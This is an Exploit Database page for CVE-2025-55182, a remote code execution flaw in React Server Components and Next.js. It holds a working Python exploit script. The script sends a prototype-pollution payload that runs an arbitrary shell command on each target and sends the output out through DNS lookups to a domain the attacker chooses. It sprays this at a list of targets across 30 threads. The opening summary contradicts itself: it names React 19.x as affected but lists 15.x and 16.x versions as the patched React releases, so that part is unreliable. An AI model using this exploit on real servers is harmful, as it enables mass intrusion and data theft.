A critical remote code execution vulnerability (CVE-2025-55182, CVSS 10.0) exists in React Server Components, exploitable via a crafted HTTP request with a malicious `Next-Action` header. The flaw affects Facebook React versions 19.0.0 through 19.2.0 and Vercel Next.js versions 15.0.0 through 15.0.4. Patches are available in React versions 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, and 16.0.7, and Next.js version 15.0.5.
This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that youβve provided to them or that theyβve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING React Server 19.2.0 - Remote Code Execution EDB-ID: 52506 CVE: 2025-55182 EDB Verified: Author: DANIELJAVANRAD Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-09 Vulnerable App: # Exploit Title: React Server 19.2.0 - Remote Code Execution # Date: 2025-12-05 # Exploit Author: [EynaExp] (https://github.com/EynaExp) # Vendor Homepage: https://react.dev # Software Link: https://react.dev/reference/rsc/server-components # Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0] # Tested on: Windows,Linux # CVE : CVE-2025-55182 import requests import urllib3 from concurrent.futures import ThreadPoolExecutor, as_completed import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Color definitions class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' END = '\033[0m' print(""" βββββββββββ βββββββ βββ ββββββ βββββββββββ ββββββββββ ββββββββββββ βββββββββ βββββββββββββββββββββββββββββββββββ βββ βββββββ ββββββ βββββββββββββββββ ββββββ ββββββββ βββ βββββ ββββββββββββββββββββββββ ββββββ βββββββ βββββββββ βββ βββ βββββββββ βββββββββββββββ ββββββ ββββββββ βββ βββ ββββββββ ββββββββββββββ ββββββ CVE-2025-55182 Proof of Concept by EynaExp GitHub: https://github.com/EynaExp """) print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}") class NoUsageParser(argparse.ArgumentParser): def error(self, message): # completely suppress argparse usage print(f"Error: {message}") raise SystemExit(1) parser = NoUsageParser(description="EynaExp Scanner") parser.add_argument('-d', required=True) parser.add_argument('-l', required=True) parser.add_argument('-c', required=True) print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n") args = parser.parse_args() dns_endpoint = args.d.strip() targets_file_path = args.l.strip() CMD = args.c.strip() headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Next-Action": "x", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" } request_body = ( "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" "Content-Disposition: form-data; name=\"0\"\r\n\r\n" "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1," "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\"," "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\"," "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n" "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" "Content-Disposition: form-data; name=\"1\"\r\n\r\n" "\"$@0\"\r\n" "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n" ) def send_request(target_url): try: response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False) result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}" for header_key in ["x-action", "next-action", "rsc"]: if header_key in response.headers: result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}" return result_message except Exception as exception: return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}" with open(targets_file_path) as file_handle: target_urls = [line.strip() for line in file_handle if line.strip()] print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets β starting multi-thread scan...{Colors.END}\n") with ThreadPoolExecutor(max_workers=30) as executor: futures = {executor.submit(send_request, url): url for url in target_urls} for future in as_completed(futures): print(future.result()) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES Β© OffSec Services Limited 2026. All rights reserved.